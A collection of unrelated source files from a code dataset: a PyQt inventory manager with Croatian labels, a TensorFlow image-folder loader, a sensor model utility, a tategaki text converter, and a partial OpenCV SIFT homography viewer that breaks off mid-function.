" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.btn_izmj.setFixedWidth(230)
self.btn_izmj.setIcon(QtGui.QIcon('change.png'))
cancel.setFixedWidth(230)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
def tab5UI(self):
layout = QFormLayout()
self.btn_izmj_code = QPushButton('IZMJENI', self)
cancel = QPushButton('PONIล TI', self)
self.art_code_name = QLineEdit()
layout.addRow("ARTIKAL", self.art_code_name)
self.art_code_izmj = QLineEdit()
layout.addRow("NOVA ล IFRA", self.art_code_izmj)
layout.addWidget(self.btn_izmj_code)
layout.addWidget(cancel)
self.tab5.setLayout(layout)
self.art_code_name.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_code_izmj.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_code_name.setFixedWidth(350)
self.art_code_izmj.setFixedWidth(200)
self.btn_izmj_code.clicked.connect(self.call_izmj_code)
cancel.clicked.connect(self.art_code_name.clear)
cancel.clicked.connect(self.art_code_izmj.clear)
self.btn_izmj_code.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.btn_izmj_code.setFixedWidth(230)
self.btn_izmj_code.setIcon(QtGui.QIcon('change.png'))
cancel.setFixedWidth(230)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
#IZBRISI
def call_del(self):
now = datetime.datetime.now()
art_del_date_time = now.strftime("%Y-%m-%d %H:%M")
art_name = self.art_name_del.text().replace(' ','_').lower()
art_code = self.art_code_del.text().replace(' ', '_').lower()
ad.remove_art(art_name,art_code,art_del_date_time)
#kolicina
def call_red(self):
now = datetime.datetime.now()
art_red_date_time = now.strftime("%Y-%m-%d %H:%M")
art_name = self.art_name_red.text().replace(' ','_').lower()
try:
art_val = -(int(self.art_count_red.text()))
print(art_val)
print(type(art_val))
ad.update_quantity(art_name, art_val, art_red_date_time)
except Exception:
print('Krivi podatak!')
#izmj. cijene
def call_izmj(self):
now = datetime.datetime.now()
art_red_date_time = now.strftime("%Y-%m-%d %H:%M")
art_name = self.art_name_izmj.text().replace(' ', '_').lower()
try:
art_cost = (int(self.art_count_izmj.text()))
print(art_cost)
print(type(art_cost))
ad.update_cost(art_name, art_cost, art_red_date_time)
except Exception:
print('Krivi podatak!')
def call_izmj_code(self):
art_name = self.art_code_name.text().replace(' ', '_').lower()
try:
art_code = (int(self.art_code_izmj.text()))
print(art_code)
print(type(art_code))
ad.update_code(art_name, art_code)
except Exception:
print('Krivi podatak!')
#DODAJ
def call_add(self):
now = datetime.datetime.now()
art_call_add_date_time = now.strftime("%Y-%m-%d %H:%M")
art_name = self.art_name_add.text().replace(' ','_').lower()
art_val = int(self.art_count_add.text())
ad.update_quantity(art_name, art_val, art_call_add_date_time)
def stack3UI(self):
table = ad.show_art()
print('prikaz')
print(table)
layout = QVBoxLayout(self)
self.srb = QPushButton()
self.srb1 = QPushButton()
self.srb.setText("PRETRAลฝI")
self.srb1.setText("DOHVATI ARTIKLE")
self.View = QTableWidget()
self.lbl3 = QLabel()
self.lbl_conf_text = QLabel()
self.lbl_conf_text.setText("PRETRAลฝI:")
self.lbl_conf_text.setContentsMargins(20,10,0,0)
self.conf_text = QLineEdit()
self.conf_text.setStyleSheet("background-color: rgb(255, 255, 255);")
self.conf_text.setPlaceholderText("Unesi naziv artikla ili poฤetno slovo...")
self.conf_text.setFixedWidth(320)
self.conf_text.setContentsMargins(0,10,0,10)
self.View.setColumnCount(4)
self.View.setColumnWidth(0, 250)
self.View.setColumnWidth(1, 200)
self.View.setColumnWidth(2, 200)
self.View.setColumnWidth(3, 200)
self.View.setStyleSheet("background-color: rgb(255, 255, 255);")
self.View.horizontalScrollBar().setStyleSheet("background-color: rbg(136, 136 , 136);")
self.View.verticalScrollBar().setStyleSheet("background-color: rbg(136, 136 , 136);")
self.View.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.View.setHorizontalHeaderLabels(["ARTIKAL", "KOLIฤINA", "CIJENA", "ล IFRA"])
self.View.setSortingEnabled(True)
self.View.insertRow(0)
layout.addWidget(self.View)
layout.addWidget(self.lbl_conf_text)
layout.addWidget(self.conf_text)
layout.addWidget(self.srb)
layout.addWidget(self.srb1)
layout.addWidget(self.lbl3)
self.srb.clicked.connect(self.show_search)
self.srb1.clicked.connect(self.show_search)
self.stack3.setLayout(layout)
self.srb.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.srb.setFixedWidth(230)
self.srb.setIcon(QtGui.QIcon('search.png'))
self.srb1.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.srb1.setFixedWidth(230)
self.srb1.setIcon(QtGui.QIcon('grab.png'))
def stack4UI(self):
layout = QVBoxLayout()
self.srt = QPushButton()
self.srt.setText("DOHVATI LOGOVE")
self.Trans = QTableWidget()
self.lbl4 = QLabel()
self.trans_text = QLineEdit()
self.trans_text.setDisabled(True)
self.Trans.setColumnCount(6)
self.Trans.setColumnWidth(0, 150)
self.Trans.setColumnWidth(1, 150)
self.Trans.setColumnWidth(2, 150)
self.Trans.setColumnWidth(3, 100)
self.Trans.setColumnWidth(4, 100)
self.Trans.setColumnWidth(5, 500)
self.Trans.setStyleSheet("background-color: rgb(255, 255, 255);")
self.Trans.horizontalScrollBar().setStyleSheet("background-color: rbg(136, 136 , 136);")
self.Trans.verticalScrollBar().setStyleSheet("background-color: rbg(136, 136 , 136);")
self.Trans.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.Trans.setSortingEnabled(True)
self.Trans.setHorizontalHeaderLabels(["LOG ID", "ARTIKAL ili ล IFRA", "NAREDBA", "DATUM","VRIJEME","DETALJI"])
self.Trans.insertRow(0)
self.Trans.setRowHeight(0, 50)
layout.addWidget(self.Trans)
layout.addWidget(self.trans_text)
layout.addWidget(self.srt)
layout.addWidget(self.lbl4)
self.srt.clicked.connect(self.show_trans_history)
self.stack4.setLayout(layout)
self.srt.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.srt.setFixedWidth(230)
self.srt.setIcon(QtGui.QIcon('grab.png'))
#PRETRAGA
def show_search(self):
if self.View.rowCount()>1:
for i in range(1,self.View.rowCount()):
self.View.removeRow(1)
x_act = ad.show_art()
x = []
if self.conf_text.text() != '':
for i in range(0,len(x_act)):
a = list(x_act[i])
if self.conf_text.text().lower() in a[0].lower():
x.append(a)
else:
x = ad.show_art()
if len(x)!=0:
for i in range(1,len(x)+1):
self.View.insertRow(i)
a = list(x[i-1])
self.View.setItem(i, 0, QTableWidgetItem(a[0].replace('_',' ').upper()))
self.View.setItem(i, 1, QTableWidgetItem(str(a[1])))
self.View.setItem(i, 2, QTableWidgetItem(str(a[2])))
self.View.setItem(i, 3, QTableWidgetItem(str(a[3])))
self.View.setRowHeight(i, 50)
self.lbl3.setText('Trenutno stanje artikla.')
else:
self.lbl3.setText('Nema podatka u bazi.')
#upis logova
def show_trans_history(self):
if self.Trans.rowCount()>1:
for i in range(1,self.Trans.rowCount()):
self.Trans.removeRow(1)
path = os.path.join(os.path.dirname(os.path.realpath(__file__)),'logovi.txt')
if os.path.exists(path):
tsearch = open(path, 'r')
x_c = tsearch.readlines()
tsearch.close()
x = []
if self.trans_text.text() != '':
key = self.trans_text.text()
for i in range(0,len(x_c)):
a = x_c[i].split(" ")
name = a[0]
action = a[-2]
if (key.lower() in name.lower()) or (key.lower() in action.lower()) :
x.append(a)
else:
x = x_c.copy()
for i in range(0,len(x)):
x.sort(key=lambda a: a[4])
print(x)
tid = 1
for i in range(1,len(x)+1):
self.Trans.insertRow(i)
a = x[i-1].split(" ")
if a[-2] == 'UPDATE':
p = 'Izmjenjena poฤetna koliฤina :'+a[1]+' nova koliฤina: '+a[2]
elif a[-2] == 'INSERT':
p = 'Artikal dodan sa koliฤinom : '+a[1]+' i cijenom : '+a[2]
elif a[-2] == 'REMOVE':
p = 'Izbrisan artikal'
else:
p = 'Niลกta'
self.Trans.setItem(i, 0, QTableWidgetItem(str(tid)))
self.Trans.setItem(i, 1, QTableWidgetItem(a[0].replace('_',' ')))
self.Trans.setItem(i, 2, QTableWidgetItem(a[-2]))
self.Trans.setItem(i, 3, QTableWidgetItem(a[3]))
self.Trans.setItem(i, 4, QTableWidgetItem(a[4]))
self.Trans.setItem(i, 5, QTableWidgetItem(p))
self.Trans.setRowHeight(i, 50)
tid += 1
self.lbl4.setText('Logovi izmjena.')
else:
self.lbl4.setText('Nije pronaฤen podatak.')
def display(self, i):
self.Stack.setCurrentIndex(i)
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
login = Login()
if login.exec_() == QtWidgets.QDialog.Accepted:
window = Glavni()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
ac2140d66e608e2720d3249c509e35216dae3be1 | 4757bfab7c7dc2e4949352b697d71c2dd42e12df | /datasets/image_folder.py | a8a20b987cba659bc6cc62e33e3cb956b1112711 | [] | no_license | rwightman/tensorflow-models-slim | bfb85b5725c6f7a73764af6d65f131eb72c716f0 | c4e4729e36d4c596df5f5d952474537792fff131 | refs/heads/master | 2021-08-14T15:23:53.313910 | 2017-11-16T03:48:12 | 2017-11-16T03:48:12 | 110,747,821 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,596 | py | # Copyright 2017 Ross Wightman. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import os
import os.path
import re
IMG_EXTENSIONS = ['.png', '.jpg', '.jpeg']
def natural_key(string_):
"""See http://www.codinghorror.com/blog/archives/001018.html"""
return [int(s) if s.isdigit() else s for s in re.split(r'(\d+)', string_.lower())]
def find_images_and_targets(
folder,
types=IMG_EXTENSIONS,
class_to_idx=None,
has_background=False,
leaf_name_only=True,
sort=True):
if class_to_idx is None:
class_to_idx = dict()
build_class_idx = True
else:
build_class_idx = False
labels = []
filenames = []
for root, subdirs, files in os.walk(folder, topdown=False):
rel_path = os.path.relpath(root, folder) if (root != folder) else ''
label = os.path.basename(rel_path) if leaf_name_only else rel_path.replace(os.path.sep, '_')
if build_class_idx and not subdirs:
class_to_idx[label] = 0
for f in files:
base, ext = os.path.splitext(f)
if ext.lower() in types:
filenames.append(os.path.join(root, f))
labels.append(label)
if build_class_idx:
classes = sorted(class_to_idx.keys(), key=natural_key)
for i, c in enumerate(classes):
class_to_idx[c] = i + 1 if has_background else i
images_and_targets = zip(filenames, [class_to_idx[l] for l in labels])
if sort:
images_and_targets = sorted(images_and_targets, key=lambda k: natural_key(k[0]))
if build_class_idx:
return images_and_targets, classes, class_to_idx
else:
return images_and_targets
def _load_image(filename):
image_string = tf.read_file(filename)
image_decoded = tf.image.decode_jpeg(image_string, channels=3)
image_decoded = tf.image.convert_image_dtype(image_decoded, dtype=tf.float32)
return image_decoded
class DatasetImageFolder:
""" Dataset for reading images organized in folders by class.
This dataset uses the tf.data.Dataset iterators and directly loads images
from files in folders instead of relying on TFRecords format.
By default the dataset is setup to work out of the box with imagenet for
TF models that have 1001 classes and a background class at 0.
"""
def __init__(
self, root,
split='train',
num_classes=1001,
has_background=True,
labels_file='./datasets/imagenet_lsvrc_2015_synsets.txt'):
if labels_file and os.path.exists(labels_file):
class_to_idx = {}
classes = []
with open(labels_file) as fp:
for i, label in enumerate(map(str.strip, fp)):
class_to_idx[label] = i + 1 if has_background else i
classes.append(label)
images_and_targets = find_images_and_targets(
root, class_to_idx=class_to_idx)
else:
images_and_targets, classes, class_to_idx = find_images_and_targets(
root, has_background=has_background)
if len(images_and_targets) == 0:
raise (RuntimeError(
"Found 0 images in subfolders of: " + root + "\n"
"Supported image extensions are: " + ",".join(IMG_EXTENSIONS)))
self.root = root
self.split = split
self.num_classes = num_classes
images, targets = zip(*images_and_targets)
self.images = images
self.targets = targets
self.num_samples = len(images)
self.classes = classes
self.class_to_idx = class_to_idx
def get_iterator(
self,
process_fn=lambda x: x, shuffle=False,
batch_size=32, epochs=-1, num_threads=4, num_pull=1):
def _parse_data(filename, label):
image_decoded = _load_image(filename)
image_processed = process_fn(image_decoded)
return image_processed, label
images_arr = np.array(self.images)
targets_arr = np.array(self.targets)
if shuffle:
p = np.random.permutation(len(images_arr))
images_arr = images_arr[p]
targets_arr = targets_arr[p]
dataset = tf.data.Dataset.from_tensor_slices((images_arr, targets_arr))
if shuffle:
dataset = dataset.shuffle(buffer_size=10000)
dataset = dataset.map(_parse_data, num_parallel_calls=num_threads)
dataset = dataset.prefetch((num_threads + 1) * batch_size * num_pull)
dataset = dataset.repeat(epochs)
dataset = dataset.batch(batch_size)
dataset = dataset.prefetch(num_pull)
return dataset.make_one_shot_iterator()
def get_inputs(
self,
process_fn=lambda x: x, shuffle=False,
batch_size=32, epochs=-1, num_threads=4, num_pull=1):
return self.get_iterator(
process_fn, shuffle, batch_size, epochs, num_threads, num_pull).get_next()
def get_split(split_name, dataset_dir, file_pattern=None, reader=None):
"""Gets a dataset capable of reading images in <class>/img folder structure.
"""
return DatasetImageFolder(dataset_dir, split=split_name)
| [
"[email protected]"
] | |
56cfc69b4f0df71f263ce973542e8d0957a0ec87 | 79d2d6388831714560082f44bcb1e029d76a60cb | /ๅๆ/็ฎๆณไบคไบ/health/three_model_rms/utils/model_util.py | 3a4391846dccc45ce1c1542af54be8703e7127d2 | [] | no_license | fishishappyandfree/project_shenzhen | a82393a775b5f91f23ea71538c034ce02420dc7f | 5663416142a64c00f5532f852f72a47986787382 | refs/heads/master | 2020-08-10T11:27:29.855142 | 2019-10-17T07:01:46 | 2019-10-17T07:01:46 | 214,322,318 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,331 | py | # coding=utf-8
from models.MT1_x_feed.run_model_gpu import Model as mt1_x_feed_model
from models.MT2_ae_raw.run_model_gpu import Model as mt2_ae_raw_model
from models.MT2_ae_rms.run_model_gpu import Model as mt2_ae_rms_model
from models.MT2_micphone.run_model_gpu import Model as mt2_micphone_model
from models.MT2_spindle_z.run_model_gpu import Model as mt2_spindle_z_model
from models.MT2_x_feed.run_model_gpu import Model as mt2_x_feed_model
from models.MT2_y_feed.run_model_gpu import Model as mt2_y_feed_model
from models.MT3_micphone.run_model_gpu import Model as mt3_micphone_model
from models.MT3_x_feed.run_model_gpu import Model as mt3_x_feed_model
from models.MT3_y_feed.run_model_gpu import Model as mt3_y_feed_model
from models.TG_x_feed.run_model_gpu import Model as tg_x_feed_model
from models.TG_y_feed.run_model_gpu import Model as tg_y_feed_model
from utils.common_config import get_sensor_checkpoints
"""
ๆ นๆฎsensor_id็กฎๅฎcheckpoints่ทฏๅพๅๆ่ฆ่ฐ็จ็ๆจกๅ
"""
class Model_Util(object):
def __init__(self):
# home ่ทฏๅพ
self.home_path = "/wzs/model/three_model"
self.sensor_model = {
"cDAQ9189-1D71297Mod1/ai3": mt1_x_feed_model(),
"cDAQ9189-1D91958Mod5/ai1": mt2_ae_rms_model(),
"cDAQ9189-1D71297Mod5/ai1": mt2_micphone_model(),
"cDAQ9189-1D71297Mod3/ai2": mt2_spindle_z_model(),
"cDAQ9189-1D71297Mod3/ai3": mt2_x_feed_model(),
"cDAQ9189-1D71297Mod2/ai1": mt2_y_feed_model(),
"cDAQ9189-1D71297Mod5/ai2": mt3_micphone_model(),
"cDAQ9189-1D71297Mod4/ai3": mt3_x_feed_model(),
"cDAQ9189-1D71297Mod2/ai2": mt3_y_feed_model(),
"cDAQ2Mod2/ai3": tg_x_feed_model(),
"cDAQ2Mod3/ai0": tg_y_feed_model()
}
self.checkpoints = get_sensor_checkpoints()["one"]
# ๆต่ฏ
def call_model_test(self, sensor_id, data, created):
path, model = self.get_path_and_model(sensor_id)
if path is None or model is None:
return None
else:
path = self.home_path + path
# ๆ
้็ฑปๅซ, ่ฏฅๆ
้็ฑปๅซๅ็็ๆฆ็
#fault_pred_class, show_pro_fault_pred_class, = model.run_test(data, path)
fault_pred_class, show_pro_fault_pred_class, health_percent = model.run_test(data, path)
if fault_pred_class is not None and fault_pred_class != 0:
breakdownData = {}
breakdownData["collectInterFaceNo"] = str(sensor_id)
breakdownData["breakdownType"] = str(fault_pred_class)
breakdownData["percent"] = str(int(show_pro_fault_pred_class * 100))
breakdownData["health"] = str(int(health_percent * 100))
breakdownData["created"] = str(created)
return breakdownData
else:
return None
# ่ฎญ็ป
def call_model_train(self, sensor_id, samples_train, labels_train):
path, model = self.get_path_and_model(sensor_id)
if path is None or model is None:
return None, None
version = model.run_train(samples_train, labels_train, path)
return path, version
def get_path_and_model(self, sensor_id):
path = self.checkpoints.get(sensor_id)
model = self.sensor_model.get(sensor_id)
return path, model
| [
"[email protected]"
] | |
9871d6ba47aae3ea6f9505b0039828e21640b9bf | 2a2a8f2b3530bcd73f8d982078a8c6b56634cfb3 | /Recognition/venv/Scripts/pasteurize-script.py | 969d0821a08bd6675ef27efc426b96a92941685f | [] | no_license | donghkim714/Smart-Face-Recognition-DoorLock | b7c4a832060c20fd83fe4472e412b0aea8ffeefa | 719d10a19ab651e6b91affb0625acae9eb90fe1a | refs/heads/master | 2022-12-22T01:56:59.467400 | 2020-05-29T07:10:00 | 2020-05-29T07:10:00 | 234,720,732 | 0 | 0 | null | 2022-12-15T23:56:07 | 2020-01-18T10:54:37 | Python | UTF-8 | Python | false | false | 426 | py | #!D:\Document\Phyton\Recognition\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','pasteurize'
__requires__ = 'future==0.18.2'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('future==0.18.2', 'console_scripts', 'pasteurize')()
)
| [
"[email protected]"
] | |
aef65d16f2d1a8b3d741801733609eb9fe8b4197 | 88356c3d62d7b9f88107572592899ebb10dc0469 | /tatega.py | 79eda284c5dfcaea1f26f26cd6cdc6a06193db96 | [
"MIT"
] | permissive | p1scescom/tategapy | 7206e7d4ea30c90a85d95ec6d8cc5de5e832d611 | 529cc4f35161ff22c26fcc70a2e9711e815949f2 | refs/heads/master | 2020-12-10T03:25:23.242227 | 2017-06-27T08:16:12 | 2017-06-27T08:16:12 | 95,531,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,540 | py | #!/usr/bin/env python
#coding: utf-8
import argparse
import sys
import unicodedata
def zen_han(char):
res = unicodedata.east_asian_width(char)
if res == 'F' or res == 'W':
return True
else:
return False
def make_tategaki(sents, return_len, gyo_h=0):
tategaki_script = []
for i in range(return_len):
for sent in sents:
try:
char = sent[i]
except IndexError:
char = ' '
char = char if zen_han(char) else (' ' + char)
try:
tategaki_script[i] = char + ' ' * gyo_h + tategaki_script[i]
except IndexError:
tategaki_script = tategaki_script + [char]
return tategaki_script
def sentences_len_max(sents):
max = 0
for sent in sents:
leng = len(sent)
if max < leng:
max = leng
return max
def convert_tategaki(*, script='', gyo_h=0,):
sents = script.split('\n')
sent_len_max = sentences_len_max(sents)
tategaki_script = make_tategaki(sents, sent_len_max, gyo_h=gyo_h)
return tategaki_script
if __name__ == '__main__':
parser = argparse.ArgumentParser(usage='This script is convert script to tategaki',
description='description',
epilog='Please find some good using ways',
add_help=True,)
parser.add_argument("script_file",
nargs = '?',
default=None,
type = str,
help ="set script file",)
parser.add_argument("-gh", "--gyohaba",
type=int,
default=0,
help="gyou haba")
args = parser.parse_args()
if args.script_file is None:
script = ''
try:
script = input()
except EOFError:
pass
while True:
try:
script = script + '\n' + input()
except EOFError:
print('\n'.join(convert_tategaki(script=script, gyo_h=args.gyohaba)))
break
else:
try:
with open(args.script_file,'r') as script_file:
script = ''.join(script_file.readlines()).rstrip()
print('\n'.join(convert_tategaki(script=script, gyo_h=args.gyohaba)))
except FileNotFoundError:
sys.stderr.write('The file is not found.\nPlease set a existing file name.\n')
| [
"[email protected]"
] | |
554ff26433d1e3de8eb9d3d3bc3f4ce6c947a2c7 | bcd4ceb019f605fecafb6b392f025e8f7a3b4874 | /SIFT_app.py | f77c475aceb28dff0da3a10deea4a76371c63342 | [] | no_license | ChristianMalherbe/ENPH353_LAB4 | 08c8db93f53ebe53f1920d037d2d43ffb62bb7ec | 45dcee7a3e0bbb33d20a3fce15ccc9e917a89cfa | refs/heads/master | 2022-12-21T02:32:36.319721 | 2020-10-06T03:34:17 | 2020-10-06T03:34:17 | 301,603,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,479 | py | #!/usr/bin/env python
from PyQt5 import QtCore, QtGui, QtWidgets
from python_qt_binding import loadUi
import cv2
import sys
import numpy as np
import time
"""
Author: Christian Malherbe
App for showing homography for an image, and a video feed. I don't have a webcam, so I recorded
a video and am using that recording.
"""
class My_App(QtWidgets.QMainWindow):
def __init__(self):
super(My_App, self).__init__()
loadUi("./SIFT_app.ui", self)
self._cam_id = 0
self._cam_fps = 2
self._is_cam_enabled = False
self._is_template_loaded = False
self.browse_button.clicked.connect(self.SLOT_browse_button)
self.toggle_cam_button.clicked.connect(self.SLOT_toggle_camera)
# Timer used to trigger the camera
self._timer = QtCore.QTimer(self)
self._timer.timeout.connect(self.SLOT_query_camera)
self.vid = "/home/fizzer/SIFT_app/Robot Video.mp4"
self.VidCap = cv2.VideoCapture(self.vid)
self.ImgPath = "/home/fizzer/SIFT_app/000_image.jpg"
def SLOT_browse_button(self):
dlg = QtWidgets.QFileDialog()
dlg.setFileMode(QtWidgets.QFileDialog.ExistingFile)
if dlg.exec_():
self.template_path = dlg.selectedFiles()[0]
pixmap = QtGui.QPixmap(self.template_path)
#This is the image
self.template_label.setPixmap(pixmap)
print("Loaded template image file: " + self.template_path)
# Source: stackoverflow.com/questions/34232632/
def convert_cv_to_pixmap(self, cv_img):
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
height, width, channel = cv_img.shape
bytesPerLine = channel * width
q_img = QtGui.QImage(cv_img.data, width, height,
bytesPerLine, QtGui.QImage.Format_RGB888)
return QtGui.QPixmap.fromImage(q_img)
def SLOT_query_camera(self):
#Reference image, in grey scale
img = cv2.imread(self.ImgPath,cv2.IMREAD_GRAYSCALE)
# Create a sift object for using SIFT related functions
sift = cv2.xfeatures2d.SIFT_create()
#Get the keypoints and descriptors of the robot image
kp_image, desc_image = sift.detectAndCompute(img, None)
# Feature matching
index_params = dict(algorithm=0, trees=5)
search_params = dict()
flann = cv2.FlannBasedMatcher(index_params, search_params)
self.VidCap.set(3, 320)
self.VidCap.set(4, 240)
#Read frames of the recorded video
val,frame = self.VidCap.read()
"""Frame must be resized"""
wid = int(frame.shape[1]* 1/3)
hei = int(frame.shape[0]* 1/3)
dimensions = (wid,hei)
frame = cv2.resize(frame,dimensions,interpolation = cv2.INTER_AREA)
print(frame.size)
grayframe = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # trainimage
kp_grayframe, desc_grayframe = sift.detectAndCompute(grayframe, None)
matches = flann.knnMatch(desc_image, desc_grayframe, k=2)
good_points = []
for m, n in matches:
if m.distance < 0.6 * n.distance:
good_points.append(m)
if(len(good_points) > 10):
query_pts = np.float32([kp_image[m.queryIdx].pt for m in good_points]).reshape(-1, 1, 2)
print(query_pts)
train_pts = np.float32([kp_grayframe[m.trainIdx].pt for m in good_points]).reshape(-1, 1, 2)
print(train_pts)
matrix, mask = cv2.findHomography(query_pts, train_pts, cv2.RANSAC, 5.0)
matches_mask = mask.ravel().tolist()
# Perspective transform
h, w = img.shape
pts = np.float32([[0, 0], [0, h], [w, h], [w, 0]]).reshape(-1, 1, 2)
dst = cv2.perspectiveTransform(pts, matrix)
homography = cv2.polylines(frame, [np.int32(dst)], True, (255, 0, 0), 3)
pixmap = self.convert_cv_to_pixmap(frame)
self.live_image_label.setPixmap(pixmap)
else:
self.live_image_label.setPixmap(self.convert_cv_to_pixmap(frame))
def SLOT_toggle_camera(self):
""" Open the video at the specified location. """
if self._is_cam_enabled:
self._timer.stop()
self._is_cam_enabled = False
self.toggle_cam_button.setText("&Enable camera")
else:
self._timer.start()
